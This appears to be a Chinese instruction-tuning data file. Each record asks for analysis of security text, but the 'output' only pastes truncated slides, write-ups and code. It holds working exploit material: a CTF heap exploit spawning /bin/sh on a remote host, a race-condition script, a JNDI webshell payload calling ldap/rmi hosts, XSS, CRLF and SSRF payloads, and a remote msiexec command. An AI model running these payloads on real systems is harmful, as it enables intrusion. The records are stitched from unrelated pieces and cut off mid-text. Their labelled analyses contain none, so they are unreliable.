Incredibly Safe   NYC alone has almost 60,000 elevators  11 billion trips per year, 30 million every day  Annually there are only about 24 injuries requiring medical attention Throughout the entire nation of 300+ million citizens, an average of just 26 people die in a given year riding elevators http://enterthecore.net If Used Properly Elevators are Incredibly Safe   NYC alone has almost 60,000 elevators  11 billion trips per year, 30 million every day  Annually there are only about 24 injuries requiring medical attention Throughout the entire nation of 300+ million citizens, an average of just 26 people die in a given year riding elevators  the vast majority are trained professionals working on the devices at the time. http://enterthecore.net Warning  Dying is Not Good http://enterthecore.net Warning  Damage is Not Good http://enterthecore.net Warning  Damage is Not Good http://enterthecore.net Warning  Damage is Not Good http://enterthecore.net Warning  Were Professionals INTRODUCTION TO ELEVATORS http://enterthecore.net Terms & Technology  Traction vs Hydro http://enterthecor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport requests import sys url = \"http://172.17.0.2/\" url = \"https://insocodevault.insomnihack.ch/\" uuid = \"5c3c3191-fe28-4d51-94b4-3aabb6e15ab8\" def reset(): requests.get(url + \"reset/\" + uuid) def checkout(target): requests.get(url + \"checkout/\" + uuid + \"/\" + target) def read(target): return requests.get(url + \"repo/\" + uuid + \"/\" + target).text def work1(): while True: reset() checkout(\"flag.txt\") def work2(): while True: print(read(\"flag.txt\")) if len(sys.argv) > 1: work1() else: work2()", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Python安全 --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## 代码混淆 - [Hnfull/Intensio-Obfuscator: Obfuscate a python code 2.x and 3.x](https://github.com/Hnfull/Intensio-Obfuscator) --- ## 编译成二进制 - Pyinstaller - py2exe - [Nuitka/Nuitka](https://github.com/Nuitka/Nuitka) --- ## 隐藏 Traceback 信息 Python 运行报错时打印的 Trackback 信息也会泄露一些信息可以使用如下方法隐藏 ```py import sys sys.stderr = open(\"/dev/null\", 'w') ``` --- ## pyc ### pyc 反编译 - [pyc反编译](./Python安全/pyc反编译.md) ### pyc 隐写 - [AngelKitty/stegosaurus](https://github.com/AngelKitty/stegosaurus) - Stegosaurus是一个隐写工具它允许我们在Python字节码文件pyc或pyo中嵌入任意的Payloads由于编码密度低嵌入Payloads的过程不会改变源代码的运行行为也不会改变源文件的文件大小Payload 代码散布在字节码中所以像 strings 这样的代码工具无法找到实际的 PayloadPython的dis模块返回源文件的字节码然后我们可以使用Stegosaurus来嵌入PayloadStegosaurus 仅支持 Python3.6 及其以下版本 --- ## 沙箱逃逸 - [沙箱逃逸](./Python安全/沙箱逃逸.md) --- ## flask 安全 - [flask安全](../Web安全/实验/flask.md) --- ## Python 代码审计 - [Python代码审计](./Python安全/Python代码审计.md)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMind Games 1 Introduction to Species, Lost in Apple-eating Time I have to admit, I love this wee little story. Its the best I could do at the time, trying to express the unthinkable in words. It was the unthinkable, I think, that I was thinking, walking around the park near which I live in Fox Point, Wisconsin, thinking, just thinking. Sometimes I think aloud and sometimes I practice speeches as I walk, and I look pretty wild to those who dont, dont walk and talk and think with single-minded intensity, focused on whats inside, oblivious to and not caring how it looks. Once a young person knows that the meaningful compass is inside, they pretty much own themselves (of course, that inside self is formed in and by a community, we are social animals after all, and the communities we choose do matter, as I often said, preaching to the faithful (more or less) on Sunday mornings). But I digress. This is no place for exploring paradoxical complex- ities.... or maybe it is, since the walls of a self look like cellular walls inside the self or cell but like modular adjacencies when seen as parts of a whole, making up an organism, and thats what this story is about... the angle, the point of view, the frame of reference. Anyway, I was walking around the park, thinking of how as what-we-arbitrarily-call species evolve, the boundaries between Richard Thieme 2 them disappear. The names we give them go away. (Are you notic- ing common themes in these stories?) Think of that long banquet table at which each generation is represented by a person, we are only one person or two away from Einstein and only a hundred or so people away from a neolithic ancestor. Each person can talk to the one beside him or her, maybe to someone a couple of seats away, but pretty soon the conversation disintegrates into gibberish. Species link to one another in a similar way. And species inhabit the universe like plankton inhabit the seas, by gazillions. Way too many to think. And as intelligent species ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n智能合约消息调用攻防 隐形人真忙 [at] 百度安全 关于作者 ID隐形人真忙 Title百度安全工程师 Work从事攻防技术研究 & 安全产品研发 Weibohttps://weibo.com/alivexploitcat 微博关注 以太坊架构与 攻击面介绍 EVM消息调 用原理剖析 消息调用攻防 议题总结 以太坊架构与攻击面介绍 以太坊架构以各个攻击面 Web3.js 传统Web安全漏洞 去中心化应用 智能合约层 EVM虚拟机 RPC层 Block Chain Block 共 识 算 法 PoW PoS Miner Network P2P Crypto Solidity  Transaction Database Agent CPU/GPU Worker Peer Protocol Sync 智能合约代码漏洞 EVM机制特性缺陷 RPC未授权访问DoS漏洞等 共识协议缺陷 51%攻击 P2P网络漏洞 Eclipse攻击 Miner算法逻辑漏洞 钱包漏洞密钥泄露等 EVM消息调用原理剖析 什么是消息调用Message Call  是一种从一个以太坊账户向另一个账户发送消息的行为  可以用于转账跨合约方法调用  一次消息调用可以携带数据  data 全部的calldata  gas 执行交易携带的gas  sender 发送者的地址  sig calldata的前四个字节  value 以太币数额 基本概念 msg结构 跨合约方法调用原理 ABI规范 合约1 合约2 gas 调用发起方 调用执行方 value data  调用发起合约 Client  调用执行合约 Server  ABI HTTP协议  Gas/value/data HTTP Data Web Database Contract Block chain msg 跨合约方法调用原理  <address>.call(方法选择器, arg1, arg2, )  <address>.call(bytes) 调用形式 call参数详解  方法选择器4 bytes  方法摘要test(uint256,uint256)  bytes4(bytes32(sha3(test(uint256,uint256))))  参数列表N bytes  按照一定的格式对不同类型的参数进行编排  32字节一个单位不够的高位补0  方法选择器  0xeb8ac921  参数1  0x0000000000000000000000000000000000000 000000000000000000000000001  参数2  0x0000000000000000000000000000000000000 000000000000000000000000002 Calldata 0xeb8ac921000000000000000000000000000 0000000000000000000000000000000000001 0000000000000000000000000000000000000 000000000000000000000000002 调用 test(1, 2) ABI 规 范 跨合约方法调用原理 智能合约消息调用攻防 消息调用的一些特性  外部方法调用深度最大为1024超过1024则调用失败  即使调用过程中出现异常但是call本身不会抛出异常  获取不到执行方法的返回值只返回true和false  call调用链中msg.sender是按照最近一次发起对象来确定的  EVM分解参数时存在参数填充和参数截断的特性 Reentrancy漏洞 Bank Contract contract Bank{ function withdraw(){ uint amountToWithdraw = balances[msg.sender] ; if(msg.sender.call.value(amountToWithdraw)() == false){ throw ; } balances[msg.sender] = 0 ; } }  <address>.send(ethValue)  2300 gas  <address>.transfer(ethValue)  2300 gas  <address>.call.value(ethValue)()  所有可用gas User Contract contract User{ function money(address addr){ Bank(addr).withdraw() ; } function () payable{ //some log codes } } contract Attacker{ function money(ad", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nelectron安全简记 0x01-electron启动 通常 electron 项的应是 main.js 也可以 package.json 中配置 npm start 脚本它 以 package.json 中的 main 属性寻找件 electron . main.js 的致逻辑就是调 BrowserWindow 启动窗体在此之前执 preload.js 预加载些 ipc函数接设置环境变量等 # main.js const { app, BrowserWindow } = require('electron') const path = require('path') function createWindow () { const win = new BrowserWindow({ width: 800, height: 600, webPreferences: { preload: path.join(__dirname, 'preload.js') } }) win.loadFile('index.html') } app.whenReady().then(() => { createWindow() app.on('activate', () => { if (BrowserWindow.getAllWindows().length === 0) { createWindow() } }) }) app.on('window-all-closed', () => { if (process.platform !== 'darwin') { app.quit() } }) 关于快速启动个electron应可以参考官册的代 码https://www.electronjs.org/zh/docs/latest/tutorial/quick-start 产环境多 electron-packager 对编写的应进打包成exe或者其他跨平台的可执程 序 electron-packager . myfirstapp --win --out ./output --arch=x64 --electron- version=17.0.0 --app-version=1.0. 0x02-electron进程通信 Electron 应会为每个打开的 BrowserWindow ( 每个嵌 ) 成个单独的渲染器进程即 不同代表不同的 RenderProcess 这点应该和 Chromium Site Isolation 处理致进程 间的通信由 ipc 完成 0x03-安全问题的个讨论 electron@12之后需要设置 BrowserWindow 的启动参数如下才能在渲染进程的 <script> 标签 中使 JavaScript 调 nodeContextAPI 例如require函数等 win = new BrowserWindow({ width: 800, height: 600, webPreferences: { //safe configure nodeIntegration: false, contextIsolation: true, preload: path.join(__dirname, 'preload.js'), sandbox: true } }); win.loadFile(\"index.html\"); 1设置nodeIntegration为false将禁在渲染进程中获取node原模块缺省值为false 2设置sandbox为true将禁在渲染进程中获取node原模块缺省值为false 3设置contextIsolcation为true将隔离预加载脚本preload.js中定义的api缺省值为true 综合12点会导致渲染进程的 <script> 标签不能加载 require 的情况 electron@5 之前 默认 contextIsolcation 为 true  electron@12 以后默认为安全值 contextIsolation 的主 要的是阻渲染器进程原型链污染到主进程来隔离变量与此同时在使 BrowserView 嵌的如 iframe  Webview 等 webPreferences 取默认值安全 nodeIntegrationInWorker带来的问题 nodeIntegration 有很多选项如 nodeIntegrationInWorker 和 nodeintegrationinsubframes 从字意思不难看出是允许 Web Worker 或者 iframe 获 取 NodeContext 这以 nodeIntegrationInWorker 为例当 nodeIntegrationI", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSteal Everything, Kill Everyone, Cause Total Financial Ruin! (or how I walked in & Misbehaved!) Jayson E. Street, C|EH, CISSP, GSEC, GCIH, C|IH, IEM, IAM, ETC Let go of my EGO Who Am I? @jaysonstreet Let go of my EGO Who Am I? @jaysonstreet Hacker/Social Engineer INFOSEC talk = slide like this ;-)  Sun Wu (Tzu) Ping-fa(The Art of War)  deception. Hence,  Contents  INTRO  1. Fact  2. Rules  3. Outcomes  Outcome 1.  Outcome 2.  Outcome 3.  Conclusions and or Discussions 1. FACT = Im getting in . and ! 1. FACT = Im getting in . and ! 1 3 5 1. Steal Everything 2. Rules = I aim to misbehave. Lets go be bad guys. 3. Outcomes = Im this guy http://allstate.com 3. Outcomes = Also proper credit is due my Sensei http://www.lares.com/ Management is reactive not Proactive  The best way to get management excited about a disaster plan is to burn down the building across the street.  Dan Erwin, Security Officer, Dow Chemical Co. -2008 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything 1. Steal Everything Countermeasures of theft 1. Lock your desk and door when ever you leave (even for a short time). Do not leave your wallet, purse, credit cards, cash, checkbook, or other valuables in the open. 2. Never prop open exterior doors. If you see a door propped, close it. 3. Never allow people you do not know to tailgate behind you into the building! Every person who is authorized to be in your building should have either card access or a key. Politely tell them that you cannot allow them in and that they need to contact security 4. Never loan your Company ID card to anyone. If you misplace it, report it to security immediately. 5. Never leave your laptop computer, cell-phone, book bag, purse or other valuables unattended. 6. If you see a suspicious person or someone you dont believe should be in or around the building call Security or the police immediately. htt", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDIY Hardware implant over I2C Part of the NSA Playset Josh Datko and Teddy Reed DEF CON 2 2 August 10, 2014 Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 1 / 60 Outline 1 Introduction NSA Playset DEF CON Series 2 Deconstruction I2C Attack Surfaces 3 Reconstruction I2C Module Controller Device GSM Module 4 Improvements and Future Work CHUCKWAGON Improvements GSM Exfil Alternaive: Audio 5 Wrapup 6 Demo Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 2 / 60 NSA Playset Series What is the NSA Playset? We hope the NSA Playset will make cutting edge security tools more accessible, easier to understand, and harder to forget. NSA Playset Talks RF Retroreflector Penn & Teller Friday 12:00 DIY Hardware Implant Track 1 Sunday 11:00 GSM Sniffing Track 1 Sunday 12:00 PCIe Track 2 Sunday 14:00 Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 3 / 60 Inspired by the NSA The NSA apparently has a hardware hacking catalog.1 Flip. . . Flip. . . Flip. . . Oh look honey, theres an I2C controller board we can get. It attaches to a computer and its modular, so you can add a GSM cell phone for exfil. Thats nice dear. I wonder how that works. . . 1like SkyMall for spies and without the Bigfoot. Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 4 / 60 Requirements for the implant From the docs: Must attach over I2C to the target. Must include GSM reachback to the implant. Our requirements: Easy to use. Open Source Hardware. Flexible: Allow for multiple communication and software protocols. Fun. Single chip solutions arent as fun. Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 5 / 60 Implant Control Diagram Josh Datko and Teddy Reed (DEF CON 2 2 ) DIY Hardware implant over I2C August 10, 2014 6 / 60 Background: What is I2C Serial bus. Two-wires: (plus power and ground).2 I Data: SDA I Clock: SCL Multi-maste", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH NOHUP 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 nohup \\- 使程序运行时不挂起不向 tty 输出信息 .SH 概述 \\fBnohup\\fP \\fI\\,命令 \\/\\fP[\\fI\\,参数列表\\/\\fP]... .br \\fBnohup\\fP \\fI\\,选项\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 运行命令并忽略挂起信号 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 如果标准输入来自终端则将标准输入重定向为一个不可读文件如果标准输出定向至终端则在可能的情况下将输出附加在 'nohup.out' 文件后否则附加到 \\&'$HOME/nohup.out'如果标准错误定向至终端则重定向至标准输出使用nohup 命令 > 文件可将输出保存到指定文件 .PP 注意您的 shell 可能内置了自己的 nohup 程序版本它通常会覆盖这里所提及的相应版本请查阅您的 shell 文档获知它所支持的选项 .SH 作者 由 Jim Meyering 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/nohup> .br 或者在本地使用 info \\(aq(coreutils) nohup invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLinux 全盘加密 看了橙子酱大佬的加密分区解密让我想起了我之前做过 Linux 的全盘加密 特此分享一下思路 1. 首先安装系统选择 /根分区加密 就 3 个分区一个 swap 一个 boot 一个根分区加密密码自定义 其余都正常安装就拿 centos6.9 举例 2.进入系统打开/usr/share/dracut/modules.d/90crypt/目录看了说明文档找到的 修改 cryptroot-ask.sh 把 108-112 行加上#注释然后增加一行(如图) echo \"password\" | cryptsetup luksOpen -T1 \"$device\" \"$luksname\" 其中的 password 是 luks 分区需要加密时候要输入的密码 如果不做这个修改每次启动的时候都要手动输入一次根分区的密码通过修改这个脚本可 以让系统启动的时候自动输入你设置的 luks 密码 保存修改运行 dracut --force 重新生成 initrd 镜像 原本到这里 luks 全盘加密开机自动输入密码已经 ok但是 grub 还是有机会被人编辑从 而直接跳过 root 密码 如果不考虑 grub 到问题全盘加密自动输入密码到此结束了 只能再次设置障碍 /dev/mapper/ 名字自己改一下 比如说 dbaroot自定义 对应的 Grub.conf 也一起修改 Grub.conf 最后的 rhgb quiet 不用删 保存修改运行 dracut --force 重新生成 initrd 镜像这是第二次 dracut其实第一次可以不用 gracut 的 这里可以修改 init 和 kennel 的名字 改成 md5 之类的 到这里可以重启一下检查一下刚修改的是否 ok 关键在于 grub 所以重新安装 grub rpm 编译环境需要一摸一样的 grub.conf 我用的 grub-0.97-99.el6 其他安装步骤都一样 唯一不同的在于 我把/boot/grub/grub.conf 这个配置文件给一起编译进 去了 修改一下源码多一个参数 --enable-preset-menu=/boot/grub/grub.conf ./configure --enable-preset-menu=/boot/grub/grub.conf (./configure --host=x86_64-redhat-linux-gnu --build=x86_64-redhat-linux-gnu --program- prefix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin -- sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include --libdir=/usr/lib64 -- libexecdir=/usr/libexec --localstatedir=/var --sharedstatedir=/var/lib --mandir=/usr/share/man --infodir=/usr/share/info --sbindir=/sbin --disable-auto-linux-mem-opt -- datarootdir=/usr/share --enable-preset-menu=/boot/grub/grub.conf) 生成的文件 /root/rpmbuild/RPMS/x86_64/grub-0.97-99.el6.x86_64.rpm rpm -ivh ***.rpm grub-install /dev/sda 最后把 boot/grub/grub.conf 删掉 重启系统一切 ok保护好你的 root 密码", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOWNING THE CLOUT THROUGH SSRF AND PDF GENERATORS Ben Sadeghipour Cody Brocious WHO ARE WE  Head of Hacker Operations at HackerOne  Top 20 hacker on HackerOne  Snapchat, Yahoo, DoD, Airbnb, Valve, etc.  Youtube/Twitch/social media: @NahamSec Ben Sadeghipour  Head of Hacker Education at HackerOne  Not top 20 on HackerOne  Hotel locks, Nintendo Switch, iTunes, etc.  Twitter: @daeken Cody Brocious In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. The attacker can supply or a modify a URL which the code running on the server will read or submit data to, and by carefully selecting the URLs, the attacker may be able to read server configuration such as AWS metadata, connect to internal services like http enabled databases or perform post requests towards internal services which are not intended to be exposed. TL;DR: Make requests using the target host and in some cases render JS server side SSRF According to OWASP What is Cloud Metadata?  169.254.164.254 is accessible internally within the machine you have access to.  Provides details like internal IP, hostname, project details, etc. And if youre lucky enough, it could also give you access to access_key & secret_key as well Basic Example  Upload avatar via URL and triggers the following request: GET /api/v1/fetch?url=https://site.com/myfunnycatmeme.jpeg Host: thesiteweareabouttpwn.com  Changing the URL parameter to something.internal.target.com may give us access to see internal assets  Not limited to http, you can use other protocols  file:///etc/passwd  gopher://  ssh://  But its not always that easy CVE Examples Similar to previous slides JIRA CVE-2017-9506 CVE Examples https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a Pointing consumerUri to Google Similar to previous slides JIRA CVE-2017-9506 CVE Examples https://medium.com/bugbountywriteup/piercing-the-veil-server-side-re", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n@Y4tacker jsp新webshell的探索之旅 简介 这篇章记录了我从个发现到实现RCE为了实现更短的webshell在这之间遇到了不断 的新问题再到解决再到最终精简得到个新的jsp五Payload构成的webshell的过程 发现 在tomcat的扫描中都有对些配置件的扫描以及对的属性解析赋值的过程由于之前的 些发现(这不多说)今天下午个突如其来的crush在我中出现我去跟踪了下解析 context.xml的过程 在 org.apache.catalina.startup.ContextConfig#contextConfig 中从这可以看 到defaultContextXml要么从标准上下要么则是默认值 conf/context.xml 接下来在解析阶段在其中的 org.apache.tomcat.util.digester.Digester#startElement 引起了我的注意 这如果匹配到标签 Context 或 Manager 则会去调  org.apache.tomcat.util.digester.SetPropertiesRule#begin ,这个函数中取出 属性赋值的地如下 之后通过调setProperty法去调属性的set法具体如下(部分截图) 到了这个思路就涌现在我脑中还记得fastJson的第个payload吗 这不就是都是set的过程 之后我在contenx.xml中加上 { \"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"ldap://vps/TouchFile\", \"autoCommit\":true } <Manager className=\"com.sun.rowset.JdbcRowSetImpl\" dataSourceName=\"rmi://127.0.0.1/Exploit\" autoCommit=\"true\"></Manager> 再次启动tomcat成功弹出了计算器 新的问题 可是这个利链过程是在tomcat启动的过程啊要想彻底解决我们还得去看看它是通过什么函 数进解析以及我们是否能控制呢 在 org.apache.catalina.startup.ContextConfig#init 中我们看看关键的步骤 可以看到函数 contextConfig 中传个 contextDigester 对象这个对象我们也很好得 到虽然这是个protected修饰的函数但是的过程却都是public修饰的因此我们直接 复制出来即可 protected void init() { Digester contextDigester = createContextDigester(); contextDigester.getParser(); ---------------- contextConfig(contextDigester); } 继续跟进执在 org.apache.catalina.startup.ContextConfig#contextConfig 最 开始我们便提到了要么从标准上下要么则是默认值 conf/context.xml 那么为了扩展 攻击利我们肯定选择前者 流程实现构造Webshell 因此我们再梳理下上的利流程 1.实例化ContextConfig 2.获取StandardContext添加到ContextConfig的context 3.初始化Digester对象 4.调ContextConfig的contextConfig函数执利过程 <%@ page import=\"org.apache.catalina.startup.ContextConfig\" %> <%@ page import=\"org.apache.tomcat.util.digester.Digester\" %> <%@ page import=\"java.util.List\" %> <%@ page import=\"java.util.HashMap\" %> <%@ page import=\"java.util.ArrayList\" %> <%@ page import=\"org.apache.tomcat.util.digester.RuleSet\" %> <%@ page import=\"org.apache.catalina.startup.ContextRuleSet\" %> <%@ page import=\"org.apache.catalina.startup.NamingRuleSet\" %> <%@ page import=\"java.lang.reflect.Method\" %> <%@ page imp", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n在不久前参加了一次众测项目需对某厂商的系统进行漏洞挖掘 在测试一套系统时发现了很有意思的接口可以操作另外两个站的输出点以此导 致多处 XSS 触发 0x01初探 Vulnerabilities 系统的 URL 是这样的https://xxx.com/passport/?fromUrl=https://xxx.com/ 显然这样的 url 容易出现 Open Redirect XSS CRLF 注入的漏洞其次还有以下这样 的参数 redirect ref redirect_to redirect_url url jump jump_to target to link linkto domain server 比较随意的测试一番 https://xxx.com/passport/?fromUrl=https://www.baidu.com https://xxx.com/passport/?fromUrl=https://www.baidu.com.eval.com https://xxx.com/passport/?fromUrl=https://www.baidu.com@www.eval.com https://xxx.com/passport/?fromUrl=javascript:alert(1) https://xxx.com/passport/?fromUrl=xxxx%0D%0ASet-Cookie:hacker=crlf CRLF 注入是否存在查看 cookie 值是否包含 hacker=crlf 字样即可 简单测试后发现并没有触发以上的漏洞 So 只能深入到系统的功能点和接口做测试 0x02深入虎穴 这边登录至系统进一步挖掘 PS登录后系统提示需要填写 xxx 信息这样的情况我个人习惯会插 入><img/src=1>进行注册 经过前期的信息收集下使用子域名爆破工具成功枚举出 h5.xxx.com 这样的手机 端网站 由于我们目前处于 xxx.com 这个域内的登录状态所以我现在访问 https://h5.xxx.com/ 也是一样处于登录状态这种情况在大厂商中的账号登录以及一 些 SSO 单点中较为常见 点击右上方我的 进入个人中心页面 这边跳转进入到个人中心 看到个人资料这一功能这代表着 可能存在 Ø 修改资料导致 XSS Ø 越权修改他人资料信息 Ø 删除他人信息 Ø 替换某参数的值越权查看他人资料 等等..一系列的逻辑问题 这边修改个人资料并且使用 XSS 镶入页面的上下文 x\"><svg/onload=alert(1)> 截图的时候忘记把 payload 改过来了 将就看看  保存后发现对用户名有限制通过 burpsuite 修改返回包但是无果 So 只能重新填写打一遍了只修改简介里为 payload 昵称任意填写 最后成功在个人资料的简介里插入代码https://user.xxx.com/h5/myUserInfo/ 从上述来看 并没有太大用处 后续在想能否找到让他人通过我的个人资料 ID 值就可以预览到我的资料呢 利用 BurpSuite 爬虫功能爬取了页面上的功能点接口 最终在 https://h5.xxx.com/book/xxxx.html 的书籍作者中找到了可以查询笔者的 接口 https://user.xxx.com/see/h5/1574.html 拼接我个人资料的 ID 值 试试水 https://user.xxx.com/see/h5/1548888.html 本来以为很容易就挖掘到存储 XSS 了但事实并非如此找到个人资料接口访问后 那个简历的信息并没有展示在页面的上下文 只显示了 我当时登录系统的作者笔名 从上所述分析现在只需要找到一处可以修改作者笔名的功能并且不限制输入字数 的那么便有机会触发存储 XSS 经过一番接口爬取下 and 目录扫描最终找到了一处没有任何过滤机制的网站下成功 修改到了作者笔名https://user.xxx.com/www/ 修改作者笔名的接口较为隐蔽藏在这个作者资料中 因为上述联动了几个网站我以为这个作者资料是修改的本站账号信息后来发现 这个接口可以让前面系统上的笔名同时生效 https://user.xxx.com/www/userinfo/contact.html 那么这里就根据规定填写资料就可以了重点就是在作者笔名中插入 payload 点击保存设置进行盲打 最后就是到了见证奇迹的时候了 在本站点中https://user.xxx.com/www/xxx/?xx=1548888 触发漏洞 然后回到上述步骤中访问所拼接获得的个人资料 url 地址 接口一https://user.xxx.com/see/h5/1548888.html 访问后发现上", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1218-002-win-签名的二进制代理执行控制面板 ## 来自ATT&CK的描述 攻击者可能滥用msiexec.exe来代理恶意有效负载的执行Msiexec.exe是Windows安装程序的命令行实用程序因此通常与执行安装包.msi相关联Msiexec.exe由Microsoft进行数字签名 攻击者可能滥用msiexec.exe来启动本地或网络可访问的MSI文件Msiexec.exe还可以执行DLL由于Msiexec.exe在Windows系统上是签名的因此可以使用Msiexec.exe绕过不考虑其潜在滥用的应用程序控制解决方案如果启用了AlwaysInstallElevated策略Msiexec.exe的执行也可以提升为系统权限 ## 测试案例 来自微软的msiexec介绍<https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/msiexec> ```yml msiexec.exe /q /i \"C:\\path\\xx.msi\" msiexec.exe /q /I http://8.8.4.4/xx.msi msiexec.exe /y \"C:\\path\\xx.dll\" ``` ## 检测日志 windows security ## 测试复现 仅做演示 ```yml C:\\Users\\Administrator>msiexec.exe /q /I http://www.baidu.com/1.msi ``` ## 测试留痕 windows 安全日志 4688 ```yml 已创建新进程 创建者主题: 安全 ID: QAX\\Administrator 帐户名: Administrator 帐户域: QAX 登录 ID: 0x9D23C 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0x19c 新进程名称: C:\\Windows\\System32\\msiexec.exe 令牌提升类型: %%1936 强制性标签: Mandatory Label\\High Mandatory Level 创建者进程 ID: 0x690 创建者进程名称: C:\\Windows\\System32\\cmd.exe 进程命令行: msiexec.exe /q /I http://www.baidu.com/1.msi ``` ## 检测规则/思路 ### Sigma规则 ```yml title: 使用msiexec.exe执行恶意程序 description: 攻击者可能滥用msiexec.exe来启动本地或网络可访问的MSI文件 status: experimental references: - https://docs.microsoft.com/zh-cn/windows-server/administration/windows-commands/msiexec logsource:  product: windows  service: security detection:  selection:  EventID:  - 4688 #Windows 安全日志 New Process Name: 'msiexec .exe' #Application Name Commanline: - '/q' - '/y' - '/i'  condition: selection level: low ``` ## 建议 使用进程监控来监视msiexec.exe的执行和参数将msiexec.exe的最近调用与已知良好自变量和执行的MSI文件或DLL的先前历史进行比较以确定异常和潜在的对抗活动在调用msiexec.exe之前和之后使用的命令参数在确定正在执行的MSI文件或DLL的来源和用途方面也可能很有用 ## 缓解措施 1. 禁用或删除功能或程序将Msiexec.exe的执行限制为需要使用它的特权帐户或组以减少恶意使用的机会 2. 特权账户管理将Msiexec.exe的执行限制为需要使用它的特权帐户或组以减少恶意使用的机会 ## 参考推荐 MITRE-ATT&CK-T1218-007 <https://attack.mitre.org/techniques/T1218/007/> 跟着ATT&CK学安全之defense-evasion <https://snappyjack.github.io/articles/2020-01/%E8%B7%9F%E7%9D%80ATT&CK%E5%AD%A6%E5%AE%89%E5%85%A8%E4%B9%8Bdefense-e", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n5space WriteUp By Nu1L 5space WriteUp By Nu1L Pwn takeeasy easyfp easybuf Reverse ddl re1 Web easyupload easysqli codereview Misc D1fFeReNcE_F@1G Can_you_be_rich Crypto Chaotic babystream 创新向 Love trinewbee Pwn takeeasy 给溢出直接溢出打 easyfp bye的时候stream可以uaf, 打IO来泄漏然后打free_hook from pwn import * # s = process(\"./pwn\",aslr=False) def cmd(idx): s.sendlineafter(\">> \",str(idx)) def add(name): cmd(1) s.sendafter(\"Name:\",name) def say(buf): cmd(3) s.sendafter(\"Say what do you want to say\",buf) def free(name): cmd(2) s.sendafter(\"Name:\",name) def bye(y): cmd(4) s.sendafter('Do you really want to say bye?',y) def pwn(s): for i in range(7): bye('n') say('123') bye('n') add(p64(0xfbad3884)) add('1') add('2') add('3') add('4') add('5') bye('n') say('123') bye('n') say('123') bye('n') add(p16(0x92f0)) add('123') add('\\x00'*0x18+'\\xf0') add('123') add('234') free('123') free('234') say(p64(0xfbad3884)) bye('n') say(p64(0xfbad3884)) bye('n') add(p16(0x9308)) add(p64(0xfbad3884)) add(p64(0xffffffffffffffff)*2) easybuf pbtk可以直接提取出来proto件转pyc转py是任意地址读写 add('\\x00'*0xb0+p64(0xfbad3884)+p64(0)*3+'\\x00') libc = ELF(\"./libc.so.6\") libc.address = u64(s.recvuntil(\"\\x7f\")[-6:]+\"\\x00\\x00\")-0x1ec980 success(hex(libc.address)) add('123') free('123') bye('n') say('123') bye('n') add(p64(libc.sym['__free_hook']-8)) add('123') add('/bin/sh\\x00'+p64(libc.sym['system'])) # gdb.attach(s) free('/bin/sh\\x00') s.interactive() exit(0) while True: # s = process(\"./pwn\") s = remote(\"47.93.56.17\",\"39642\") try: pwn(s) except Exception as e: pass s.close() from test_pb2 import 